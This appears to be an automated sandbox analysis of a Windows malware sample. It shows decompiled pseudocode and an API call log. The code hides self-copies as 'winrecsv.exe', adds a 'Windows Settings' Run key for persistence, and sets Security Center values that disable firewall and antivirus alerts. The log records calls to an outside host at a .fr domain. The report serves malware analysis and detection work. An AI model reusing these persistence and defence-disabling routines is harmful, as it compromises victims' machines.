                                                                                  						DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_v2688 = 0;
                                                                                  					while(_v2688 < 0x7d0) {
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0x7d0);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  						Sleep(0xfa0);
                                                                                  						_v2688 = _v2688 + 1;
                                                                                  					}
                                                                                  					goto L15;
                                                                                  				}
                                                                                  				_t182 = CreateMutexA(0, 0, "984658"); // executed
                                                                                  				_v2640 = _t182;
                                                                                  				if(GetLastError() != 0xb7) {
                                                                                  					_v1064 = 0;
                                                                                  					_v528 = 1;
                                                                                  					GetModuleFileNameW(0, "C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe", 0x105);
                                                                                  					_v532 = PathFindFileNameW("C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe");
                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", "C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe");
                                                                                  					_t447 = _t446 + 0xc;
                                                                                  					DeleteFileW( &_v524); // executed
                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                  					_v3104 = L"winrecsv.exe";
                                                                                  					_v3108 = _v532;
                                                                                  					while(1) {
                                                                                  						_t190 = _v3108;
                                                                                  						_t367 =  *_t190;
                                                                                  						_v3110 = _t367;
                                                                                  						if(_t367 !=  *_v3104) {
                                                                                  							break;
                                                                                  						}
                                                                                  						if(_v3110 == 0) {
                                                                                  							L48:
                                                                                  							_v3116 = 0;
                                                                                  							L50:
                                                                                  							_v3120 = _v3116;
                                                                                  							if(_v3120 == 0) {
                                                                                  								L67:
                                                                                  								Sleep(0x1f4);
                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								Sleep(0x1f4);
                                                                                  								if((E0040B4A0() & 0x000000ff) != 0) {
                                                                                  									__imp__#115(0x202,  &_v3100);
                                                                                  									wsprintfW(0x414c40, L"%s\\tnnodes.dat",  &_v2636);
                                                                                  									wsprintfW(0x414620, L"%s\\tncmds.dat",  &_v2636);
                                                                                  									CreateThread(0, 0, E00404000, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E004050B0, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E00405900, 0, 0, 0);
                                                                                  									Sleep(0x2710);
                                                                                  									E00404200();
                                                                                  									E004057B0(E0040D3D0(),  &_v2636);
                                                                                  									 *0x414e64 = CreateEventA(0, 1, 0, 0);
                                                                                  									 *0x414e6c = E0040ABD0( &_v2636);
                                                                                  									 *0x414e68 = E0040BEA0( &_v2636);
                                                                                  									E0040A020();
                                                                                  									_t413 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t413, 0, E0040C360, 0, 0, 0);
                                                                                  									_t210 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t210, 0, E0040C2C0, 0, 0, 0);
                                                                                  									_t371 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t371, 0, E0040BE50, 0, 0, 0);
                                                                                  									_t414 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t414, 0, E0040BC50, 0, 0, 0);
                                                                                  								}
                                                                                  								return 0;
                                                                                  							}
                                                                                  							_t240 = E0040D4A0(); // executed
                                                                                  							if((_t240 & 0x000000ff) != 1) {
                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"winrecsv.exe");
                                                                                  								_t454 = _t447 + 0x10;
                                                                                  								_t245 = CopyFileW("C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe",  &_v1588, 0); // executed
                                                                                  								if(_t245 == 0) {
                                                                                  									L60:
                                                                                  									Sleep(0x1f4);
                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"winrecsv.exe");
                                                                                  									_t447 = _t454 + 0x10;
                                                                                  									if(CopyFileW(?str?,  &_v1060, 0) == 0) {
                                                                                  										goto L67;
                                                                                  									}
                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  										L65:
                                                                                  										_t253 = E0040D740( &_v1060);
                                                                                  										_t447 = _t447 + 4;
                                                                                  										if((_t253 & 0x000000ff) != 1) {
                                                                                  											goto L67;
                                                                                  										}
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v3140 =  &_v1060;
                                                                                  									_v3144 = _v3140 + 2;
                                                                                  									do {
                                                                                  										_v3146 =  *_v3140;
                                                                                  										_v3140 = _v3140 + 2;
                                                                                  									} while (_v3146 != 0);
                                                                                  									_v3152 = _v3140 - _v3144 >> 1;
                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3152 + _v3152 + 2);
                                                                                  									RegCloseKey(_v1064);
                                                                                  									goto L65;
                                                                                  								}
                                                                                  								SetFileAttributesW( &_v1588, 3); // executed
                                                                                  								_t263 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064); // executed
                                                                                  								if(_t263 != 0) {
                                                                                  									L58:
                                                                                  									_t264 = E0040D740( &_v1588); // executed
                                                                                  									_t454 = _t454 + 4;
                                                                                  									if((_t264 & 0x000000ff) != 1) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									ExitProcess(0); // executed
                                                                                  								}
                                                                                  								_v3124 =  &_v1588;
                                                                                  								_v3128 = _v3124 + 2;
                                                                                  								do {
                                                                                  									_v3130 =  *_v3124;
                                                                                  									_v3124 = _v3124 + 2;
                                                                                  								} while (_v3130 != 0);
                                                                                  								_v3136 = _v3124 - _v3128 >> 1;
                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3136 + _v3136 + 2); // executed
                                                                                  								RegCloseKey(_v1064);
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  						_t190 = _v3108;
                                                                                  						_t397 =  *((intOrPtr*)(_t190 + 2));
                                                                                  						_v3112 = _t397;
                                                                                  						_t86 = _v3104 + 2; // 0x6e0069
                                                                                  						if(_t397 !=  *_t86) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v3108 = _v3108 + 4;
                                                                                  						_v3104 = _v3104 + 4;
                                                                                  						if(_v3112 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						goto L48;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                  					_v3116 = _t190;
                                                                                  					goto L50;
                                                                                  				}
                                                                                  				ExitProcess(0);
                                                                                  			}





























































                                                                                  0x00405a2e
                                                                                  0x00405a34
                                                                                  0x00405a3e
                                                                                  0x00405a48
                                                                                  0x00405a61
                                                                                  0x00405a67
                                                                                  0x00405a74
                                                                                  0x004061cb
                                                                                  0x004061d4
                                                                                  0x00000000
                                                                                  0x004061d4
                                                                                  0x00405a7f
                                                                                  0x00405a8f
                                                                                  0x00405a9f
                                                                                  0x00405ab2
                                                                                  0x00405abf
                                                                                  0x00405ac6
                                                                                  0x00405ad6
                                                                                  0x00405ad6
                                                                                  0x00405ae1
                                                                                  0x00405ae7
                                                                                  0x00405b02
                                                                                  0x00405b13
                                                                                  0x00405b23
                                                                                  0x00405b2e
                                                                                  0x00405b39
                                                                                  0x00405b49
                                                                                  0x00405b59
                                                                                  0x00405b64
                                                                                  0x00405b6f
                                                                                  0x00405afc
                                                                                  0x00405afc
                                                                                  0x00405b7f
                                                                                  0x00405b8f
                                                                                  0x00405b9a
                                                                                  0x00405baa
                                                                                  0x00405bb5
                                                                                  0x00405bc0
                                                                                  0x00405bcb
                                                                                  0x00405be4
                                                                                  0x00405bef
                                                                                  0x00405bfc
                                                                                  0x00405cf4
                                                                                  0x00405cf9
                                                                                  0x00405d06
                                                                                  0x00405d11
                                                                                  0x00405d20
                                                                                  0x00405d2d
                                                                                  0x00405d3d
                                                                                  0x00405d43
                                                                                  0x00405d4d
                                                                                  0x00405d63
                                                                                  0x00405d73
                                                                                  0x00405d83
                                                                                  0x00405d8e
                                                                                  0x00405d9e
                                                                                  0x00405da9
                                                                                  0x00405db4
                                                                                  0x00405dc7
                                                                                  0x00405de0
                                                                                  0x00405ded
                                                                                  0x00405dfd
                                                                                  0x00405e0d
                                                                                  0x00405e2d
                                                                                  0x00405e3a
                                                                                  0x00405e41
                                                                                  0x00405e4c
                                                                                  0x00405e57
                                                                                  0x00405e67
                                                                                  0x00405e72
                                                                                  0x00405e7d
                                                                                  0x00405e7d
                                                                                  0x00405e8a
                                                                                  0x00405e95
                                                                                  0x00405e95
                                                                                  0x00405ea2
                                                                                  0x00405ead
                                                                                  0x00405eba
                                                                                  0x00405ec9
                                                                                  0x00405ed4
                                                                                  0x00405ee1
                                                                                  0x00405eec
                                                                                  0x00405f05
                                                                                  0x00405f12
                                                                                  0x00405f32
                                                                                  0x00405f3f
                                                                                  0x00405f4b
                                                                                  0x00405f56
                                                                                  0x00405f61
                                                                                  0x00405f61
                                                                                  0x00405f6e
                                                                                  0x00405f79
                                                                                  0x00405f81
                                                                                  0x00405f91
                                                                                  0x00405f9c
                                                                                  0x00405fac
                                                                                  0x00405fb7
                                                                                  0x00405fb7
                                                                                  0x00405fc4
                                                                                  0x00405fc4
                                                                                  0x00405eba
                                                                                  0x00405fca
                                                                                  0x00405fd4
                                                                                  0x00405fde
                                                                                  0x00405ff9
                                                                                  0x00406006
                                                                                  0x0040600d
                                                                                  0x00406018
                                                                                  0x00406028
                                                                                  0x00406033
                                                                                  0x0040603e
                                                                                  0x0040604d
                                                                                  0x0040604d
                                                                                  0x00406053
                                                                                  0x00406062
                                                                                  0x00406069
                                                                                  0x00406074
                                                                                  0x0040607f
                                                                                  0x0040608a
                                                                                  0x00406095
                                                                                  0x004060a0
                                                                                  0x004060ab
                                                                                  0x004060b6
                                                                                  0x004060c1
                                                                                  0x004060d1
                                                                                  0x004060d1
                                                                                  0x004060e4
                                                                                  0x004060f1
                                                                                  0x004060f8
                                                                                  0x00406105
                                                                                  0x00406114
                                                                                  0x0040611f
                                                                                  0x0040612f
                                                                                  0x0040613a
                                                                                  0x00406145
                                                                                  0x00406150
                                                                                  0x0040615b
                                                                                  0x00406166
                                                                                  0x00406166
                                                                                  0x0040616c
                                                                                  0x00406187
                                                                                  0x0040619d
                                                                                  0x004061a8
                                                                                  0x004061b3
                                                                                  0x004061c3
                                                                                  0x00406181
                                                                                  0x00406181
                                                                                  0x00000000
                                                                                  0x00406187
                                                                                  0x00405c07
                                                                                  0x00405c17
                                                                                  0x00405c22
                                                                                  0x00405c2d
                                                                                  0x00405c38
                                                                                  0x00405c43
                                                                                  0x00405c63
                                                                                  0x00405c6e
                                                                                  0x00405c7b
                                                                                  0x00405cdc
                                                                                  0x00405ce3
                                                                                  0x00405cee
                                                                                  0x00000000
                                                                                  0x00405cee
                                                                                  0x00405c7d
                                                                                  0x00405c98
                                                                                  0x00405cae
                                                                                  0x00405cb9
                                                                                  0x00405cc9
                                                                                  0x00405cd4
                                                                                  0x00405c92
                                                                                  0x00405c92
                                                                                  0x00000000
                                                                                  0x00405c98
                                                                                  0x004061e8
                                                                                  0x004061ee
                                                                                  0x004061ff
                                                                                  0x00406209
                                                                                  0x00406213
                                                                                  0x00406229
                                                                                  0x0040623a
                                                                                  0x00406251
                                                                                  0x00406257
                                                                                  0x00406261
                                                                                  0x00406278
                                                                                  0x0040627e
                                                                                  0x0040628e
                                                                                  0x00406294
                                                                                  0x00406294
                                                                                  0x0040629a
                                                                                  0x0040629d
                                                                                  0x004062ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062b7
                                                                                  0x004062ee
                                                                                  0x004062ee
                                                                                  0x00406305
                                                                                  0x0040630b
                                                                                  0x00406318
                                                                                  0x00406581
                                                                                  0x00406586
                                                                                  0x004065ac
                                                                                  0x004065cb
                                                                                  0x004065ea
                                                                                  0x00406609
                                                                                  0x00406628
                                                                                  0x00406647
                                                                                  0x00406666
                                                                                  0x00406685
                                                                                  0x00406692
                                                                                  0x00406692
                                                                                  0x004066b8
                                                                                  0x004066d7
                                                                                  0x004066f6
                                                                                  0x00406715
                                                                                  0x00406734
                                                                                  0x00406753
                                                                                  0x00406772
                                                                                  0x00406791
                                                                                  0x0040679e
                                                                                  0x0040679e
                                                                                  0x004067a9
                                                                                  0x004067b9
                                                                                  0x004067cb
                                                                                  0x004067e2
                                                                                  0x004067fc
                                                                                  0x00406814
                                                                                  0x0040681f
                                                                                  0x00406834
                                                                                  0x0040683f
                                                                                  0x00406854
                                                                                  0x0040685f
                                                                                  0x00406865
                                                                                  0x0040686f
                                                                                  0x00406882
                                                                                  0x0040688c
                                                                                  0x00406896
                                                                                  0x0040689b
                                                                                  0x004068ad
                                                                                  0x004068b4
                                                                                  0x004068c9
                                                                                  0x004068cf
                                                                                  0x004068e4
                                                                                  0x004068eb
                                                                                  0x00406900
                                                                                  0x00406907
                                                                                  0x0040690c
                                                                                  0x00000000
                                                                                  0x00406913
                                                                                  0x0040631e
                                                                                  0x00406329
                                                                                  0x00406344
                                                                                  0x00406362
                                                                                  0x00406368
                                                                                  0x00406379
                                                                                  0x00406381
                                                                                  0x00406460
                                                                                  0x00406465
                                                                                  0x00406483
                                                                                  0x00406489
                                                                                  0x004064a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004064b1
                                                                                  0x004064d7
                                                                                  0x00406562
                                                                                  0x00406569
                                                                                  0x0040656e
                                                                                  0x00406577
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040657b
                                                                                  0x0040657b
                                                                                  0x004064e3
                                                                                  0x004064f2
                                                                                  0x004064f8
                                                                                  0x00406501
                                                                                  0x00406508
                                                                                  0x0040650f
                                                                                  0x00406527
                                                                                  0x0040654f
                                                                                  0x0040655c
                                                                                  0x00000000
                                                                                  0x0040655c
                                                                                  0x00406390
                                                                                  0x004063ae
                                                                                  0x004063b6
                                                                                  0x00406441
                                                                                  0x00406448
                                                                                  0x0040644d
                                                                                  0x00406456
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040645a
                                                                                  0x0040645a
                                                                                  0x004063c2
                                                                                  0x004063d1
                                                                                  0x004063d7
                                                                                  0x004063e0
                                                                                  0x004063e7
                                                                                  0x004063ee
                                                                                  0x00406406
                                                                                  0x0040642e
                                                                                  0x0040643b
                                                                                  0x00000000
                                                                                  0x0040643b
                                                                                  0x0040632d
                                                                                  0x0040632d
                                                                                  0x004062b9
                                                                                  0x004062bf
                                                                                  0x004062c3
                                                                                  0x004062d0
                                                                                  0x004062d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062d6
                                                                                  0x004062dd
                                                                                  0x004062ec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062ec
                                                                                  0x004062fa
                                                                                  0x004062fc
                                                                                  0x004062ff
                                                                                  0x00000000
                                                                                  0x004062ff
                                                                                  0x00406203

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001B58), ref: 00405A2E
                                                                                  • FindWindowA.USER32 ref: 00405A61
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405A7F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A8F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A9F
                                                                                  • FindWindowA.USER32 ref: 00405AAC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AC6
                                                                                  • MoveFileA.KERNEL32 ref: 00405AD6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AE1
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B13
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 00405B23
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405B2E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B39
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B49
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B59
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405B64
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405B6F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405B7F
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B8F
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B9A
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405BAA
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405BB5
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BC0
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BCB
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405BDE
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405BEF
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405C07
                                                                                  • MoveFileA.KERNEL32 ref: 00405C17
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405C22
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405C2D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C38
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405C43
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405C5D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C6E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405CAE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CB9
                                                                                  • MoveFileA.KERNEL32 ref: 00405CC9
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405CD4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405CE3
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405CEE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CF9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405D06
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405D11
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00405D20
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405D2D
                                                                                  • MoveFileA.KERNEL32 ref: 00405D3D
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D83
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405D8E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D9E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405DA9
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405DB4
                                                                                  • FindWindowA.USER32 ref: 00405DC1
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405DDA
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405DFD
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405E0D
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405E27
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405E41
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405E4C
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405E57
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,argarhrharharfafrahth), ref: 00405E67
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405E72
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405E7D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405E8A
                                                                                  • Sleep.KERNEL32(00000DAC), ref: 00405E95
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405EA2
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405EAD
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00405EC9
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405ED4
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405EE1
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405EEC
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405EFF
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405F2C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405F4B
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405F56
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405F61
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F6E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F79
                                                                                  • Sleep.KERNEL32(00000064), ref: 00405F81
                                                                                  • MoveFileA.KERNEL32 ref: 00405F91
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F9C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405FAC
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405FB7
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC4
                                                                                  • FindWindowA.USER32 ref: 00405FF3
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040600D
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406018
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00406028
                                                                                  • Sleep.KERNEL32(00001388), ref: 00406033
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040603E
                                                                                  • PathFileExistsA.SHLWAPI(aefafugaugfgauegf), ref: 0040605A
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00406069
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406074
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040607F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040608A
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406095
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060A0
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060AB
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060B6
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060C1
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 004060D1
                                                                                  • FindWindowA.USER32 ref: 004060DE
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060F8
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00406105
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00406114
                                                                                  • Sleep.KERNEL32(00003A98), ref: 0040611F
                                                                                  • MoveFileA.KERNEL32 ref: 0040612F
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 0040613A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406145
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406150
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040615B
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406166
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 0040619D
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004061A8
                                                                                  • Sleep.KERNEL32(00002328), ref: 004061B3
                                                                                  • MoveFileW.KERNEL32(argarhrharharfafrahth,4yy4w4yw4fwgwgw), ref: 004061C3
                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,984658), ref: 004061E8
                                                                                  • GetLastError.KERNEL32 ref: 004061F4
                                                                                  • ExitProcess.KERNEL32 ref: 00406203
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Id4zlrsrZ4.exe,00000105), ref: 00406229
                                                                                  • PathFindFileNameW.SHLWAPI(C:\Users\user\Desktop\Id4zlrsrZ4.exe), ref: 00406234
                                                                                  • wsprintfW.USER32 ref: 00406251
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 00406261
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00406278
                                                                                  • ExitProcess.KERNEL32 ref: 0040632D
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00406344
                                                                                  • wsprintfW.USER32 ref: 00406362
                                                                                  • CopyFileW.KERNELBASE(C:\Users\user\Desktop\Id4zlrsrZ4.exe,?,00000000), ref: 00406379
                                                                                  • SetFileAttributesW.KERNELBASE(?,00000003), ref: 00406390
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004063AE
                                                                                  • RegSetValueExW.KERNELBASE(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040642E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040643B
                                                                                  • ExitProcess.KERNEL32 ref: 0040645A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406465
                                                                                  • wsprintfW.USER32 ref: 00406483
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Id4zlrsrZ4.exe,?,00000000), ref: 0040649A
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 004064B1
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004064CF
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040654F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040655C
                                                                                  • ExitProcess.KERNEL32 ref: 0040657B
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406586
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 004065A4
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004065CB
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004065EA
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406609
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406628
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406647
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406666
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406685
